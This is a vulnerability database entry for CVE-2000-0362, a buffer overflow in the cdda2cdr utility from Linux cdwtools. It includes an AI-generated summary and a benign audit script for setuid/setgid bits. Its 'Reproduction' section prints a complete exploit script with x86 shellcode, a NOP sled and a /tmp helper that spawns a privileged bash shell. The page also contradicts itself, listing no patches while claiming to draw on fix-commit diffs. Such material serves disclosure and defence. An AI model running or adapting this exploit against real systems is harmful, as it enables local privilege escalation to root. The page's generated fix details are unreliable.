CVE-2000-0362
Description
Linux cdwtools 093 and earlier contain buffer overflows allowing local users to gain root privileges.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Linux cdwtools versions 093 and earlier are vulnerable to buffer overflows. The cdda2cdr utility, which is part of the cdwtools package and may be installed setgid to the disk group, is specifically affected. The package is known to be exploitable in several ways, including buffer overflows and symbolic link attacks in /tmp [1].
Exploitation
An attacker can exploit this vulnerability by crafting a malicious input to the cdda2cdr utility. The provided exploit script cdda2x.sh demonstrates how to compile and execute a C exploit (cdda2x) that targets cdda2cdr. This involves providing specific offset and buffer size arguments to the exploit, which then attempts to overwrite a buffer and execute shellcode. The exploit also compiles and places a separate C program (cd) in /tmp which, when executed by the shellcode, will spawn a root shell via /bin/bash [1].
Impact
Successful exploitation of the buffer overflow in cdda2cdr allows a local attacker to gain root privileges on the affected system. This means an attacker can execute arbitrary commands with the highest level of privilege, potentially compromising the entire system [1].
Mitigation
Not yet disclosed in the available references. The vulnerability affects cdwtools versions 093 and earlier. Users are advised to check for updated versions or security advisories from their distribution.
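A check an administrator can run while no fix is listed, as an added example that is not part of the advisory or of cdwtools: it reports whether cdda2cdr (or any path passed in) carries the setuid or setgid bit that the privilege gain depends on. The function names are made up for this example; the default path is the one the exploit targets.

```shell
#!/bin/sh
# Added example, not from the advisory: audit binaries for the setuid/setgid
# condition that CVE-2000-0362 depends on. Function names are hypothetical.

# privileged_bits FILE
# Prints "missing", "none", "setuid", "setgid" or "setuid,setgid".
privileged_bits() {
    f=$1
    [ -f "$f" ] || { echo "missing"; return 0; }
    bits=""
    [ -u "$f" ] && bits="setuid"
    [ -g "$f" ] && bits="${bits:+$bits,}setgid"
    echo "${bits:-none}"
}

# audit_cdwtools [FILE...]
# Prints one line per file and returns 1 if any file is setuid or setgid.
# With no arguments it checks the path named in the advisory.
audit_cdwtools() {
    [ $# -gt 0 ] || set -- /usr/bin/cdda2cdr
    rc=0
    for f in "$@"; do
        state=$(privileged_bits "$f")
        case $state in
            missing)
                echo "OK       $f (not installed)" ;;
            none)
                echo "OK       $f (no setuid/setgid bit)" ;;
            *)
                # Numeric owner and group; the advisory's script refers to gid 6.
                owner=$(ls -ln "$f" | awk '{print $3 ":" $4}')
                echo "EXPOSED  $f ($state, uid:gid $owner)"
                rc=1 ;;
        esac
    done
    return $rc
}
```

An EXPOSED result can be cleared with `chmod ug-s` on the file, which removes the elevated group an overflow would inherit; unprivileged users then lose whatever device access the bit gave the tool.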
AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (3)
Patches (0)
No patches discovered yet.
Vulnerability mechanics
Root cause
"Buffer overflows in the cdda2cdr utility allow local users to gain root privileges."
Attack vector
Local users can exploit buffer overflows in the cdda2cdr utility to gain root privileges. The exploit involves crafting a malicious input string that overwrites critical memory regions, leading to arbitrary code execution. This allows an attacker to execute commands with elevated privileges. [ref_id=1]
Affected code
The vulnerability resides in the cdda2cdr utility, part of the cdwtools package. The provided exploit code targets the `/usr/bin/cdda2cdr` executable, demonstrating how a crafted input can lead to privilege escalation. [ref_id=1]
What the fix does
The advisory does not provide specific details on the patch or remediation steps. However, it indicates that the vulnerability is related to buffer overflows in the cdda2cdr utility. Users are advised to update their systems to a version where this vulnerability is addressed. [ref_id=1]
Preconditions
- auth: The attacker must have local access to the affected system.
- input: The attacker must be able to execute the cdda2cdr utility with crafted input.
Reproduction
```sh
#!/bin/sh
#source: https://www.securityfocus.com/bid/738/info
#
#cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root
#compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks.
#
#--- cdda2x.sh ---
#!/bin/sh
#
# Shell script for Linux x86 cdda2cdr exploit
# Brock Tellier btellier@usa.net
#

cat > /tmp/cdda2x.c <<EOF
/**
 ** Linux x86 exploit for /usr/bin/cdda2cdr (sgid disk on some Linux distros)
 ** gcc -o cdda2x cdda2x.c; cdda2x <offset> <bufsiz>
 **
 ** Brock Tellier btellier@usa.net
 **/

#include <stdlib.h>
#include <stdio.h>

char exec[]= /* Generic Linux x86 running our /tmp program */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/cd";

#define LEN 500
#define NOP 0x90

unsigned long get_sp(void) {
  __asm__("movl %esp, %eax");
}

void main(int argc, char *argv[]) {

  int offset=0;
  int i;
  int buflen = LEN;
  long int addr;
  char buf[LEN];

  if(argc > 3) {
    fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
    exit(0);
  }
  else if (argc == 2){
    offset=atoi(argv[1]);
  }
  else if (argc == 3) {
    offset=atoi(argv[1]);
    buflen=atoi(argv[2]);
  }
  else {
    offset=500;
    buflen=500;
  }

  addr=get_sp();

  fprintf(stderr, "Linux x86 cdda2cdr local disk exploit\n");
  fprintf(stderr, "Brock Tellier btellier@usa.net\n");
  fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

  memset(buf,NOP,buflen);
  memcpy(buf+(buflen/2),exec,strlen(exec));
  for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
    *(int *)&buf[i]=addr+offset;

  execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL);

  /*
  for (i=0; i < strlen(buf); i++) putchar(buf[i]);
  */

}
EOF

cat > /tmp/cd.c <<EOF
void main() {
  setregid(getegid(), getegid());
  system("/bin/bash");
}
EOF

gcc -o /tmp/cd /tmp/cd.c
gcc -o /tmp/cdda2x /tmp/cdda2x.c
echo "Note that gid=6 leads to easy root access.."
/tmp/cdda2x
```
[ref_id=1]
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (2)
News mentions (0)
No linked articles in our index yet.